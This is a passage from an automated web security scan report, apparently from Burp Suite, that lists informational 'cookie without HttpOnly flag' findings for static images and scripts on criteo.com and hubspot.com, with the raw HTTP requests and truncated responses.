HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:49 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 18 May 2010 18:27:15 GMT
Accept-Ranges: bytes
Content-Length: 102
Content-Type: image/gif

GIF89a............ .....!........H.....].....................!.......,...........pI3.<H.u....}.0*ErF.;

11.86. http://www.criteo.com/templates/criteo/images/backgrounds/orangebox_topright.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/images/backgrounds/orangebox_topright.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/images/backgrounds/orangebox_topright.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:49 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 18 May 2010 18:27:15 GMT
Accept-Ranges: bytes
Content-Length: 228
Content-Type: image/gif

GIF89a............H.....].....!.. ...........................!.......,...........0.I..8....`(.di.h..l..p,.tm.x..|U...bH,....r.l:...tJ.Z...v..z...xL.....z.n....@......~..........b.s..............Z.....
...[SNIP]...

11.87. http://www.criteo.com/templates/criteo/images/home/body.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/images/home/body.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/images/home/body.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:35 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 18 May 2010 18:27:18 GMT
Accept-Ranges: bytes
Content-Length: 1331
Content-Type: image/gif

GIF89a..................................................................................................................................................................................................
...[SNIP]...

11.88. http://www.criteo.com/templates/criteo/images/home/home-blue.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/images/home/home-blue.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/images/home/home-blue.jpg HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:40 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 18 May 2010 18:27:21 GMT
Accept-Ranges: bytes
Content-Length: 223773
Content-Type: image/jpeg

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2010:05:18 08:15:34.........
...[SNIP]...

11.89. http://www.criteo.com/templates/criteo/images/home/slide_arrow.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/images/home/slide_arrow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/images/home/slide_arrow.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:49 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 18 May 2010 18:27:19 GMT
Accept-Ranges: bytes
Content-Length: 87
Content-Type: image/gif

GIF89a.."........Y.......!.......,......"...(...... zm.C.....-.H....j."*......P..i.B..;

11.90. http://www.criteo.com/templates/criteo/images/home/tab_how.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/images/home/tab_how.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/images/home/tab_how.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:43 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 18 May 2010 18:27:22 GMT
Accept-Ranges: bytes
Content-Length: 12179
Content-Type: image/gif

GIF89a.........D}}}..:...$$#++*........f........"......wwwyyy......iii..................mmm...eeeqqr.....................bbb.....Z.........VVV......ZYY............^^^x.....Zdm...MNN..u...AAA.....w...1
...[SNIP]...

11.91. http://www.criteo.com/templates/criteo/images/home/tab_how_wrapper.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/images/home/tab_how_wrapper.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/images/home/tab_how_wrapper.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:43 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 18 May 2010 18:27:22 GMT
Accept-Ranges: bytes
Content-Length: 2679
Content-Type: image/gif

GIF89a..................................................................................................................................................................................................
...[SNIP]...

11.92. http://www.criteo.com/templates/criteo/images/home/tab_left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/images/home/tab_left.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/images/home/tab_left.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:43 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 18 May 2010 18:27:23 GMT
Accept-Ranges: bytes
Content-Length: 359
Content-Type: image/gif

GIF89a..N..................................................................................V.Ox.X.....Oy...............................................................................................
...[SNIP]...

11.93. http://www.criteo.com/templates/criteo/images/home/tab_right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/images/home/tab_right.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/images/home/tab_right.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:43 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 18 May 2010 18:27:23 GMT
Accept-Ranges: bytes
Content-Length: 1716
Content-Type: image/gif

GIF89a..N........................................................................................Oy.......Ox....X...........V..........................................................................
...[SNIP]...

11.94. http://www.criteo.com/templates/criteo/images/logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/images/logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/images/logo.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:35 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 18 May 2010 18:27:25 GMT
Accept-Ranges: bytes
Content-Length: 1558
Content-Type: image/gif

GIF89a..R......V........+........9.....r.....H...........d...................................................!.......,......R.... $.di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v..z...xL.....z.n..P....
...[SNIP]...

11.95. http://www.criteo.com/templates/criteo/js/script.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/js/script.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/js/script.php?templateImagePath=/templates/criteo/images/ HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.3.10.1305478412; 240plan=R1146701318; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:56:13 GMT
Server: Apache/2.2.X (OVH)
X-Powered-By: PHP/4.4.9
Content-Type: application/x-javascript
Content-Length: 4798

var templateImagePath = "/templates/criteo/images/";
var successStoriesHeight = 0;

window.addEvent("load", function ()
{
   $$("a").each(function (obj)
   {
       if (obj.href && obj.rel == "external")
       {

...[SNIP]...

11.96. http://www.criteo.com/templates/criteo/js/slides.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/js/slides.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/js/slides.js HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.3.10.1305478412; 240plan=R1146701318; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:32 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 03 Jun 2010 05:25:22 GMT
Accept-Ranges: bytes
Content-Length: 2106
Content-Type: application/javascript

var slidesObject = new Class(
{
   initialize: function (name, menuName, slidesName)
   {
       this.Name = name;
       this.MenuItems = $$("#" + menuName + " a");
       this.SlidesWrapper = $(slidesName);
       this.Sli
...[SNIP]...

11.97. http://www.criteo.com/templates/criteo/js/steps.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/js/steps.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/js/steps.js HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.3.10.1305478412; 240plan=R1146701318; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:32 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 03 Jun 2010 05:25:24 GMT
Accept-Ranges: bytes
Content-Length: 3605
Content-Type: application/javascript

var stepsObject = new Class(
{
   initialize: function(name, steps, layers)
   {
       this.Name = name;
       this.Steps = steps;
       this.Layers = layers;

       this.Buttons = null;
       this.Timeout = null;
       this.A
...[SNIP]...

11.98. http://www.criteo.com/templates/criteo/js/successstories.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/js/successstories.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/js/successstories.js HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.3.10.1305478412; 240plan=R1146701318; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:31 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 03 Jun 2010 05:25:24 GMT
Accept-Ranges: bytes
Content-Length: 2136
Content-Type: application/javascript

var successStoriesObject = new Class(
{
   initialize: function (name, wrapper, maxHeight)
   {
       this.Name = name;
       this.Wrapper = wrapper;
       this.MaxWidth = this.Wrapper.getSize().size.x;
       this.MaxHei
...[SNIP]...

11.99. http://www.criteo.com/templates/criteo/js/swfobject.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/js/swfobject.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/js/swfobject.js HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.3.10.1305478412; 240plan=R1146701318; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:32 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 03 Jun 2010 05:25:25 GMT
Accept-Ranges: bytes
Content-Length: 10220
Content-Type: application/javascript

/* SWFObject v2.2 <http://code.google.com/p/swfobject/>
is released under the MIT License <http://www.opensource.org/licenses/mit-license.php>
*/
var swfobject=function(){var D="undefined",r="objec
...[SNIP]...

11.100. http://www.criteo.com/templates/criteo/js/tabs.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/js/tabs.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/js/tabs.js HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.3.10.1305478412; 240plan=R1146701318; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:32 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Wed, 12 Jan 2011 00:48:32 GMT
Accept-Ranges: bytes
Content-Length: 2563
Content-Type: application/javascript

var tabHowObject = new Class(
{
   initialize: function (name, tabs, wrapper)
   {
       this.Name = name;
       this.Tabs = tabs;
       this.Wrapper = wrapper;

       this.Steps = null;
       this.Button = null;
       this.Ti
...[SNIP]...

11.101. http://www.criteo.com/templates/criteo/js/validation.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/js/validation.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/js/validation.js HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.3.10.1305478412; 240plan=R1146701318; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:30 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 03 Jun 2010 05:25:26 GMT
Accept-Ranges: bytes
Content-Length: 3400
Content-Type: application/javascript

var validationObject = new Class(
{
   initialize: function (fieldId)
   {
       this.Field = $(fieldId);
       this.IsValid = true;
   },

   ThrowError: function ()
   {
       this.Field.addClass("error");

       this.IsV
...[SNIP]...

11.102. http://www.hubspot.com/Portals/53/images/HubSpot_Software.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hubspot.com
Path:	/Portals/53/images/HubSpot_Software.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HUBSPOT130=68228268.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/53/images/HubSpot_Software.png HTTP/1.1
Host: www.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
